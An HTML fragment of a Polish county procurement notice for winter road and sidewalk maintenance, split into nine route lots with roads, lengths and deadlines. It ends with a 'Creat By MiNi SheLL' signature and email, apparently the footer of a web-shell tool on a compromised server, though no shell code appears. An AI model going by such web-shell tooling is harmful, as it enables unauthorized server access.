              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/11/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Część 1 - trasa nr 1 Usługa zimowego utrzymania dróg powiatowych Nr:  	2272D  Bolesławiec-Gromadka-Pasternik 	2284D  Nowa Kuźnia  - Modła 4 	2269D  Gromadka  Modła 	2285D -  Gromadka  Osła  	2270D  Krzyżowa  Osła <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa zimowego utrzymania dróg powiatowych Nr: 
	2272D  Bolesławiec-Gromadka-Pasternik
	2284D  Nowa Kuźnia  - Modła 4
	2269D  Gromadka  Modła
	2285D -  Gromadka  Osła 
	2270D  Krzyżowa  Osła 
Łączna długość trasy 98 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania Dróg (załącznik nr 2A).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Część 2  trasa nr 2 Usługa zimowego utrzymania dróg powiatowych nr : 	2275D  Krzyżowa Tomaszów (droga nr 4)  	2286D -  Bolesławiec  Kraśnik  Wilczy Las  	2287D  Kraśnik  Lipiany  	2292D  Kruszyn  Łaziska 	2291D  Łaziska  Wartowice 	2276D  Warta Bol. - Tomaszów Bol. (droga nr 4)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 2  trasa nr 2
Usługa zimowego utrzymania dróg powiatowych nr :
	2275D  Krzyżowa Tomaszów (droga nr 4) 
	2286D -  Bolesławiec  Kraśnik  Wilczy Las 
	2287D  Kraśnik  Lipiany 
	2292D  Kruszyn  Łaziska
	2291D  Łaziska  Wartowice
	2276D  Warta Bol. - Tomaszów Bol. (droga nr 4)
Łączna długość trasy 115 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania Dróg (załącznik nr 2A).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Część 3  - trasa nr3 Usługa zimowego utrzymanie dróg powiatowych Nr:   	2280D  Bolesławiec  Żeliszów  	2294D  Żeliszów  Suszki 	            2293D  Żeliszów  droga Nr 2501D (Raciborowice)  	2277D  Iwiny  Tomaszów Bol. (droga nr 4)  	2278D  Iwiny  Raciborowice  Sędzimirów 	 2290D  Raciborowice  Jurków  	2501D -  Raciborowice  Ustronie (granica powiatu)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 3  - trasa nr3
Usługa zimowego utrzymanie dróg powiatowych Nr: 
 	2280D  Bolesławiec  Żeliszów
 	2294D  Żeliszów  Suszki
	            2293D  Żeliszów  droga Nr 2501D (Raciborowice)
 	2277D  Iwiny  Tomaszów Bol. (droga nr 4)
 	2278D  Iwiny  Raciborowice  Sędzimirów
	 2290D  Raciborowice  Jurków
 	2501D -  Raciborowice  Ustronie (granica powiatu)
Łączna długość trasy 127 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania Dróg (załącznik nr 2A).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Część 4  trasa nr 4 Usługa zimowego utrzymania  na drogach powiatowych nr:  	2273D  Bolesławiec  Ocice  Gościszów (granica powiatu)  	2496D  Nowogrodziec  Gościszów  Granica powiatu  	2298D  Gościszów  Wolbromów  	2499D  Droga Nr 4  Ocice  granica powiatu  	2295D  Kraszowice  Nowa  	2296D  Ocice  Milików Kolonia <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 4  trasa nr 4
Usługa zimowego utrzymania  na drogach powiatowych nr: 
	2273D  Bolesławiec  Ocice  Gościszów (granica powiatu) 
	2496D  Nowogrodziec  Gościszów  Granica powiatu 
	2298D  Gościszów  Wolbromów 
	2499D  Droga Nr 4  Ocice  granica powiatu 
	2295D  Kraszowice  Nowa 
	2296D  Ocice  Milików Kolonia 
Łączna długość trasy 99km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania (załącznik nr 2A).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Część 5  trasa nr 5 Usługa zimowego utrzymania dróg powiatowych nr:  	2274D  Brzeźnik  Zabłocie  Nowogrodziec  	2279D  Nowogrodziec  Gierałtów  Zagajnik  	2283D  Czerna  Gierałtów  	2282D  Gierałtów  Godzieszów  	powiatowe ulice miasta Nowogrodziec <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 5  trasa nr 5
Usługa zimowego utrzymania dróg powiatowych nr: 
	2274D  Brzeźnik  Zabłocie  Nowogrodziec 
	2279D  Nowogrodziec  Gierałtów  Zagajnik 
	2283D  Czerna  Gierałtów 
	2282D  Gierałtów  Godzieszów 
	powiatowe ulice miasta Nowogrodziec 
Łączna długość trasy 98 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania Dróg (załącznik nr 2A).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Część 6  trasa nr 6 Usługa zimowego utrzymania dróg powiatowych nr:  	2271D  Osiecznica - Świętoszów  Rudawica (granica powiatu) 	2301D -  Łozy 	2300D  Przejęsław  Ławszowa 	2399D  Przejęsław  Ławszowa 	2297D  Przejęsław 	2302D  Parowa  Ołobok 	2303D  Parowa  Poświstne 	2281D  Nowogrodziec  Parzyce  Osieczów  Tomisław<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 6  trasa nr 6
Usługa zimowego utrzymania dróg powiatowych nr: 
	2271D  Osiecznica - Świętoszów  Rudawica (granica powiatu)
	2301D -  Łozy
	2300D  Przejęsław  Ławszowa
	2399D  Przejęsław  Ławszowa
	2297D  Przejęsław
	2302D  Parowa  Ołobok
	2303D  Parowa  Poświstne
	2281D  Nowogrodziec  Parzyce  Osieczów  Tomisław

Łączna długość trasy 125 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania Dróg (załącznik nr 2A)
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Część 7  trasa 7 Usługa zimowego utrzymania dróg (jezdnia  sól + solanka), odśnieżanie ulic miasta Bolesławiec. Ulice w mieście Bolesławiec: Wojewódzkie (18 km): Droga Nr 297  Kościuszki, Tamka, Bohaterów Getta, Wesoła, Łokietka, Garncarska, Komuny Paryskiej, Jeleniogórska Nr 363  Tamka, Chrobrego, Spółdzielcza, Cicha, Kosiby Powiatowe (42 km): Droga Nr 2305D  Żwirki i Wigury, Karola Miarki Droga Nr 2306D  Podgórna, Zygmunta Augusta  Droga Nr 2307D  Tyrankiewiczów, Aleja Wojska Polskiego Droga Nr 2308D  Żeromskiego Droga Nr 2309D  Łasicka Droga Nr 2310D  Zwycięstwa, Leśna  Droga Nr 2311D  Kubika, Gdańska  Droga Nr 2314D  Ogrodowa  Droga Nr 2315D  Mickiewicza  Droga Nr 2316D  Sądowa  Droga Nr 2317D  Zgorzelecka  Droga Nr 2318D  Grunwaldzka Droga Nr 2319D  Staszica Droga Nr 2320D  Dolne Młyny Droga Nr 2321D  Mostowa Droga Nr 2322D  Komuny Paryskiej Droga Nr 2323D  Staroszkolna Droga Nr 2324D  Spacerowa<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 7  trasa 7
Usługa zimowego utrzymania dróg (jezdnia  sól + solanka), odśnieżanie ulic miasta Bolesławiec.
Ulice w mieście Bolesławiec:
Wojewódzkie (18 km):
Droga Nr 297  Kościuszki, Tamka, Bohaterów Getta, Wesoła, Łokietka, Garncarska, Komuny Paryskiej, Jeleniogórska
Nr 363  Tamka, Chrobrego, Spółdzielcza, Cicha, Kosiby
Powiatowe (42 km):
Droga Nr 2305D  Żwirki i Wigury, Karola Miarki
Droga Nr 2306D  Podgórna, Zygmunta Augusta

Droga Nr 2307D  Tyrankiewiczów, Aleja Wojska Polskiego
Droga Nr 2308D  Żeromskiego
Droga Nr 2309D  Łasicka
Droga Nr 2310D  Zwycięstwa, Leśna 
Droga Nr 2311D  Kubika, Gdańska 
Droga Nr 2314D  Ogrodowa 
Droga Nr 2315D  Mickiewicza 
Droga Nr 2316D  Sądowa 
Droga Nr 2317D  Zgorzelecka 
Droga Nr 2318D  Grunwaldzka
Droga Nr 2319D  Staszica
Droga Nr 2320D  Dolne Młyny
Droga Nr 2321D  Mostowa
Droga Nr 2322D  Komuny Paryskiej
Droga Nr 2323D  Staroszkolna
Droga Nr 2324D  Spacerowa
 
Łączna długość trasy 60 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania (załącznik nr 2A).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Część 8  trasa nr 8 Odśnieżanie i posypywanie chodników przy drogach wojewódzkich w powiecie Bolesławieckim według potrzeb.  Droga nr 297  Kozłów, Stara Oleszna, Trzebień, Golnice, Dąbrowa Bolesławiecka, Łąka, Bolesławiec (Kościuszki, Tamka, Bohaterów Getta, Wesoła, Łokietka, Garncarska, Komuny Paryskiej, Jeleniogórska), Nowe Jaroszewice, Suszki. Droga Ne 363  Bolesławiec (Tamka, Chrobrego, Spółdzielcza, Cicha, Kosiby) Łaziska, Warta Bolesławiecka, Iwiny. Droga Nr 350  Bolesławiec (ul, Widok), Dobra, Kliczków, Osiecznica, Parowa. Droga Nr 357  Nowogrodziec, (Chrobrego, Słowackiego, Lubańska, Krótka, Rynek, Strzelecka), Zebrzydowa, Tomisław, Osiecznica.  Droga Nr 296  Węgliniec, Stary Węgliniec, Ruszów. Droga Nr 351  Pieńsk, Zgorzelec, Jędrzychowice. Droga Nr 353  Pieńsk.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 8  trasa nr 8
Odśnieżanie i posypywanie chodników przy drogach wojewódzkich w powiecie Bolesławieckim według potrzeb.

Droga nr 297  Kozłów, Stara Oleszna, Trzebień, Golnice, Dąbrowa Bolesławiecka, Łąka, Bolesławiec (Kościuszki, Tamka, Bohaterów Getta, Wesoła, Łokietka, Garncarska, Komuny Paryskiej, Jeleniogórska), Nowe Jaroszewice, Suszki.
Droga Ne 363  Bolesławiec (Tamka, Chrobrego, Spółdzielcza, Cicha, Kosiby) Łaziska, Warta Bolesławiecka, Iwiny.
Droga Nr 350  Bolesławiec (ul, Widok), Dobra, Kliczków, Osiecznica, Parowa.
Droga Nr 357  Nowogrodziec, (Chrobrego, Słowackiego, Lubańska, Krótka, Rynek, Strzelecka), Zebrzydowa, Tomisław, Osiecznica. 
Droga Nr 296  Węgliniec, Stary Węgliniec, Ruszów.
Droga Nr 351  Pieńsk, Zgorzelec, Jędrzychowice.
Droga Nr 353  Pieńsk.

Łączna długość trasy 58 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania Dróg (załącznik nr 2A).
Odśnieżanie i posypywanie chodników z pługiem lekkim i piaskarką o d.m.c. zestawu do 5 T do. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Część 9  trasa nr 9 Odśnieżanie i posypywanie chodników przy drogach powiatowych w powiecie Bolesławieckim według potrzeb.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 9  trasa nr 9
Odśnieżanie i posypywanie chodników przy drogach powiatowych w powiecie Bolesławieckim według potrzeb.

Bolesławiec  ulice:
Droga Nr 2305D  Żwirki i Wigury, Karola Miarki
Droga Nr 2306D  Podgórna, Zygmunta Augusta
Droga Nr 2307D  Tyrankiewiczów, Aleja Wojska Polskiego
Droga Nr 2308D  Żeromskiego
Droga Nr 2309D  Łasicka
Droga Nr 2310D  Zwycięstwa, Leśna 
Droga Nr 2311D  Kubika, Gdańska 
Droga Nr 2314D  Ogrodowa 
Droga Nr 2315D  Mickiewicza 
Droga Nr 2316D  Sądowa 
Droga Nr 2317D  Zgorzelecka 
Droga Nr 2318D  Grunwaldzka
Droga Nr 2319D  Staszica
Droga Nr 2320D  Dolne Młyny
Droga Nr 2321D  Mostowa
Droga Nr 2322D  Komuny Paryskiej
Droga Nr 2323D  Staroszkolna

Nowogrodziec  ulice:

Droga Nr 2326  Kolejowa
Droga Nr 2327  Mickiewicza
Droga Nr 2329 - Szpitalna
Droga Nr 2330  Kościelna
Drogi zamiejskie:
Droga Nr 2269 D  Gromadka, Modła
Droga Nr 2271 D  Osiecznica, Przejęsław, Świętoszów
Droga Nr 2272 D  Bolesławiec (Modłowa), Wierzbowa
Droga Nr 2273 D  Bolesławiec (Lubańska), Bożejowice, Rakowice, Otok, Kraszowice, Ocice.
Droga Nr 2274 D  Brzeźnik, Zabłocie, Nowogrodziec (Nowogrodzka, 1-go Maja, Bolesławiecka)
Droga Nr 2275 D  Tomaszów Bolesławiecki
Droga Nr 2276 D  Tomaszów Bolesławiecki, Warta Bolesławiecka
Droga Nr 2277 D  Iwiny
Droga Nr 2278 D  Iwiny, Raciborowice Dolne, Raciborowice Górne
Droga Nr 2279 D  Gierałtów, Wykroty
Droga Nr 2280 D  Stare Jaroszewice
Droga Nr 2281 D  Osieczów  Tomisław
Droga Nr 2284 D  Nowa Kuźnia, Modła
Droga Nr 2285 D  Gromadka
Droga Nr 2286 D  Bolesławiec, Kraśnik Dolny, Szczytnica
Droga Nr 2287 D  Nowa Wieś
Droga Nr 2297 D  Przejęsław
Droga Nr 2299 D  Ławszowa
Droga Nr 2300 D  Ławszowa
Droga Nr 2496 D  Milików, Nowogrodziec (Sienkiewicza)
Droga Nr 2499 D - Ocice 

Łączna długość trasy 66 km. Usługa wykonywana będzie na zasadach i według planu zimowego przewidzianych w Specyfikacji Technicznej Zimowego Utrzymania Dróg (załącznik nr 2A).
Odśnieżanie i posypywanie chodników z pługiem lekkim i piaskarką o d.m.c. zestawu do 5 T.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    34143000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com